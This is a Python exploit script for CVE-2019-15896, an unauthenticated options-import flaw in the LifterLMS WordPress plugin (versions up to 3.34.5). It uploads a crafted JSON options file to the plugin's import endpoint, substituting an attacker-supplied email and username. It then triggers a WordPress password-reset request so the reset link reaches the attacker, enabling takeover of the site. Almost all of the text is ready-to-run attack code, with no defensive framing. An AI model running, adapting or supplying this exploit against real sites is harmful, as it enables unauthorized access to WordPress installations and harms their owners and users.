#!/usr/bin/env python3
import requests
import argparse
import os


#
#
#  LifterLMS <= 3.34.5 - Unauthenticated Options Import CVE-2019-15896
#
# Exploit script by @RandomRobbieBF
#
#

http_proxy = "http://127.0.0.1:8080"
os.environ['HTTP_PROXY'] = http_proxy
os.environ['HTTPS_PROXY'] = http_proxy

# Ignore bad SSL
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

def send_forgot_password_request(url, email):
    headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0",
        "Origin": f"{url}",
    }
    payload = {
        "user_login": email,
        "wp-submit": "Get New Password",
        "redirect_to": "",
    }
    response = requests.post(f"{url}/wp-login.php?action=lostpassword", data=payload,verify=False,headers=headers)
    return response

    

def send_post_request(url,email,username):
    headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0",
        "Referer": f"{url}/wp-admin/admin.php?page=llms-import",
        "Origin": f"{url}",
        "Connection": "close",
        "Upgrade-Insecure-Requests": "1",
    }
    with open('lifter.json', 'r') as file:
        content = file.read()
    
    modified_content = content.replace("EMAIL", email).replace("USERNAME", username)
    files = {'llms_import': ('lifter.json', modified_content, 'application/json')}
    response = requests.post(f"{url}/wp-admin/admin.php?page=llms-import", files=files,headers=headers, verify=False)
    return response

def main():
    print("LifterLMS <= 3.34.5 - Unauthenticated Options Import")
    print("Exploit By Ramdom Robbie")
    print("Once ran check your email for the forgotten password link.")
    parser = argparse.ArgumentParser(description="LifterLMS <= 3.34.5 - Unauthenticated Options Import")
    parser.add_argument('--url', required=True, help='URL of the WordPress site')
    parser.add_argument('--email', required=True, help='Email address to send forgotten password to')
    parser.add_argument('--username', required=True, help='Username of your user')
    args = parser.parse_args()
    url = args.url
    username = args.username
    email = args.email
    response = send_post_request(args.url,email,username)
    response2 = send_forgot_password_request(url, email)

    if "check your email for the confirmation link" in response2.text.lower():
        print(f"Password reset email sent to {email}")
    else:
        print("Failed to send password reset email")

    

    

if __name__ == "__main__":
    main()